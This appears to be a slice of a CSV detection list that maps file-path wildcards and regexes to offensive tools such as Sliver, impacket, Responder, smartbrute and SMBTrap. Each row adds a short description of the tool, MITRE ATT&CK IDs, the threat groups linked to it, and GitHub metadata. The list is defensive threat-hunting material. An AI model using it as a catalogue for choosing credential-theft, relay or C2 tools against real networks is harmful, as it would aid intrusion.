"*\slip.py *",".{0,1000}\\slip\.py\s.{0,1000}","offensive_tool_keyword","slip","Slip is a CLI tool to create malicious archive files containing path traversal payloads","T1560.001 - T1059","TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/0xless/slip","1","0","N/A","N/A","10","2","100","4","2025-04-11T18:36:31Z","2022-10-29T15:38:36Z","18866"
"*\slip-main.zip",".{0,1000}\\slip\-main\.zip","offensive_tool_keyword","slip","Slip is a CLI tool to create malicious archive files containing path traversal payloads","T1560.001 - T1059","TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/0xless/slip","1","0","N/A","N/A","10","2","100","4","2025-04-11T18:36:31Z","2022-10-29T15:38:36Z","18867"
"*\sliver.exe*",".{0,1000}\\sliver\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","18868"
"*\sliver-client.exe*",".{0,1000}\\sliver\-client\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","18869"
"*\sliver-client_windows.exe*",".{0,1000}\\sliver\-client_windows\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","18870"
"*\sliver-client_windows-386*.exe*",".{0,1000}\\sliver\-client_windows\-386.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","18871"
"*\sliver-client_windows-amd64*.exe*",".{0,1000}\\sliver\-client_windows\-amd64.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","18872"
"*\sliver-client_windows-arm64*.exe*",".{0,1000}\\sliver\-client_windows\-arm64.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","18873"
"*\sliverpb.Exe*",".{0,1000}\\sliverpb\.Exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","18874"
"*\SlowPathMITM.py*",".{0,1000}\\SlowPathMITM\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","N/A","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","18875"
"*\Small-Net RAT v*.exe*",".{0,1000}\\Small\-Net\sRAT\sv.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","18876"
"*\SmallSecretsDump.py*",".{0,1000}\\SmallSecretsDump\.py.{0,1000}","offensive_tool_keyword","Adcheck","Assess the security of your Active Directory with few or all privileges. This tool offers functionalities similar to PingCastle","T1087 - T1012 - T1482 - T1059 - T1203 - T1212 - T1480 - T1552 - T1112 - T1207 - T1483 - T1113 - T1057 - T1136 - T1119 - T1082 - T1553 - T1140 - T1107 - T1078 - T1562","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/CobblePot59/Adcheck","1","0","N/A","N/A","10","4","315","35","2025-04-18T15:17:46Z","2024-05-10T13:54:45Z","18877"
"*\Smart RAT v*.exe*",".{0,1000}\\Smart\sRAT\sv.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","18878"
"*\smartbrute\*",".{0,1000}\\smartbrute\\.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","18879"
"*\smartbrute-main*",".{0,1000}\\smartbrute\-main.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","18880"
"*\smb_control.bat*",".{0,1000}\\smb_control\.bat.{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","0","N/A","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","18881"
"*\SMB_RPC\*.py",".{0,1000}\\SMB_RPC\\.{0,1000}\.py","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","18882"
"*\smb_SCNotification.exe*",".{0,1000}\\smb_SCNotification\.exe.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","N/A","N/A","10","3","201","25","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z","18883"
"*\SMB_Staging.c*",".{0,1000}\\SMB_Staging\.c.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","N/A","10","8","700","83","2025-01-26T08:05:48Z","2023-04-05T09:39:33Z","18884"
"*\SMB-Clear-Text-Password-*.txt*",".{0,1000}\\SMB\-Clear\-Text\-Password\-.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","18885"
"*\smbclient.exe*",".{0,1000}\\smbclient\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","risk of false positives","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","18886"
"*\smbclient.py*",".{0,1000}\\smbclient\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","18887"
"*\smbexec.py*",".{0,1000}\\smbexec\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","18888"
"*\SMBGrab.pl*",".{0,1000}\\SMBGrab\.pl.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares  and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","0","N/A","N/A","9","2","165","20","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z","18889"
"*\SMBHunt.pl*",".{0,1000}\\SMBHunt\.pl.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares  and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","0","N/A","N/A","9","2","165","20","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z","18890"
"*\SMBList.pl*",".{0,1000}\\SMBList\.pl.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares  and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","0","N/A","N/A","9","2","165","20","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z","18891"
"*\smblogin.ps1*",".{0,1000}\\smblogin\.ps1.{0,1000}","offensive_tool_keyword","Minimalistic-offensive","A repository of tools for pentesting of restricted and isolated environments.","T1110 - T1046 - T1021 - T1203 - T1485","TA0006 - TA0007 - TA0008","N/A","Dispossessor","Lateral Movement","https://github.com/InfosecMatter/Minimalistic-offensive-security-tools","1","0","N/A","N/A","7","6","562","121","2021-10-26T11:04:46Z","2020-05-10T17:40:31Z","18892"
"*\smblogin.results.txt*",".{0,1000}\\smblogin\.results\.txt.{0,1000}","offensive_tool_keyword","Minimalistic-offensive","A repository of tools for pentesting of restricted and isolated environments.","T1110 - T1046 - T1021 - T1203 - T1485","TA0006 - TA0007 - TA0008","N/A","Dispossessor","Lateral Movement","https://github.com/InfosecMatter/Minimalistic-offensive-security-tools","1","0","N/A","N/A","7","6","562","121","2021-10-26T11:04:46Z","2020-05-10T17:40:31Z","18893"
"*\smblogin-extra-mini.ps1*",".{0,1000}\\smblogin\-extra\-mini\.ps1.{0,1000}","offensive_tool_keyword","Minimalistic-offensive","A repository of tools for pentesting of restricted and isolated environments.","T1110 - T1046 - T1021 - T1203 - T1485","TA0006 - TA0007 - TA0008","N/A","Dispossessor","Credential Access","https://github.com/InfosecMatter/Minimalistic-offensive-security-tools","1","0","N/A","N/A","7","6","562","121","2021-10-26T11:04:46Z","2020-05-10T17:40:31Z","18894"
"*\smbmap.py*",".{0,1000}\\smbmap\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","18895"
"*\SMB-NTLMSSPv2-Client-*.txt*",".{0,1000}\\SMB\-NTLMSSPv2\-Client\-.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","18896"
"*\SMB-NTLMv1-Client-*.txt*",".{0,1000}\\SMB\-NTLMv1\-Client\-.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","18897"
"*\smbpasswd.py*",".{0,1000}\\smbpasswd\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","18898"
"*\smbrelayserver.py*",".{0,1000}\\smbrelayserver\.py.{0,1000}","offensive_tool_keyword","NtlmRelayToEWS","ntlmRelayToEWS is a tool for performing ntlm relay attacks on Exchange Web Services (EWS)","T1212 - T1557 - T1040 - T1078","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/Arno0x/NtlmRelayToEWS","1","0","N/A","N/A","10","4","331","60","2018-01-15T12:48:02Z","2017-10-13T18:00:50Z","18899"
"*\SMBRelay-Session.txt*",".{0,1000}\\SMBRelay\-Session\.txt.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","18900"
"*\smbrelayx.exe*",".{0,1000}\\smbrelayx\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","18901"
"*\smbrelayx.py*",".{0,1000}\\smbrelayx\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","18902"
"*\smbscan-*.csv*",".{0,1000}\\smbscan\-.{0,1000}\.csv.{0,1000}","offensive_tool_keyword","smbscan","SMBScan is a tool to enumerate file shares on an internal network.","T1135 - T1046 - T1021","TA0007 - TA0043 - TA0008","N/A","APT22","Discovery","https://github.com/jeffhacks/smbscan","1","0","N/A","N/A","8","1","44","6","2025-03-24T01:55:30Z","2021-10-26T02:28:34Z","18903"
"*\smbscan-*.log*",".{0,1000}\\smbscan\-.{0,1000}\.log.{0,1000}","offensive_tool_keyword","smbscan","SMBScan is a tool to enumerate file shares on an internal network.","T1135 - T1046 - T1021","TA0007 - TA0043 - TA0008","N/A","APT22","Discovery","https://github.com/jeffhacks/smbscan","1","0","N/A","N/A","8","1","44","6","2025-03-24T01:55:30Z","2021-10-26T02:28:34Z","18904"
"*\smbscan.py*",".{0,1000}\\smbscan\.py.{0,1000}","offensive_tool_keyword","smbscan","SMBScan is a tool to enumerate file shares on an internal network.","T1135 - T1046 - T1021","TA0007 - TA0043 - TA0008","N/A","APT22","Discovery","https://github.com/jeffhacks/smbscan","1","0","N/A","N/A","8","1","44","6","2025-03-24T01:55:30Z","2021-10-26T02:28:34Z","18905"
"*\smbserver.py*",".{0,1000}\\smbserver\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","18906"
"*\SMBSigningNotRequired.txt*",".{0,1000}\\SMBSigningNotRequired\.txt.{0,1000}","offensive_tool_keyword","CheckSMBSigning","Checks for SMB signing disabled on all hosts in the network","T1018 - T1550","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/Leo4j/CheckSMBSigning","1","0","N/A","N/A","6","1","8","1","2023-10-13T11:55:33Z","2023-05-17T11:47:52Z","18907"
"*\smbsr.db*",".{0,1000}\\smbsr\.db.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","N/A","7","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","18908"
"*\smbsr.log*",".{0,1000}\\smbsr\.log.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","N/A","7","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","18909"
"*\smbsr.py*",".{0,1000}\\smbsr\.py.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","N/A","7","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","18910"
"*\smbsr_results.csv*",".{0,1000}\\smbsr_results\.csv.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","N/A","7","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","18911"
"*\smbtrap2.py*",".{0,1000}\\smbtrap2\.py.{0,1000}","offensive_tool_keyword","SMBTrap","tool capturing authentication attempts and performing man-in-the-middle (MitM) attacks leveraging SMB services","T1071.001 - T1557.001 - T1040 - T1070.001 - T1205.001 - T1185","TA0006 - TA0008 - TA0011 - TA0005","N/A","ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/cylance/SMBTrap","1","0","N/A","N/A","8","1","84","38","2015-06-02T17:22:48Z","2015-04-13T07:08:01Z","18912"
"*\smbtrap-mitmproxy-inline.py*",".{0,1000}\\smbtrap\-mitmproxy\-inline\.py.{0,1000}","offensive_tool_keyword","SMBTrap","tool capturing authentication attempts and performing man-in-the-middle (MitM) attacks leveraging SMB services","T1071.001 - T1557.001 - T1040 - T1070.001 - T1205.001 - T1185","TA0006 - TA0008 - TA0011 - TA0005","N/A","ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/cylance/SMBTrap","1","0","N/A","N/A","8","1","84","38","2015-06-02T17:22:48Z","2015-04-13T07:08:01Z","18913"
"*\Smeagol.log*",".{0,1000}\\Smeagol\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","18914"
"*\SMTP-Clear-Text-Password-*.txt*",".{0,1000}\\SMTP\-Clear\-Text\-Password\-.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","18915"
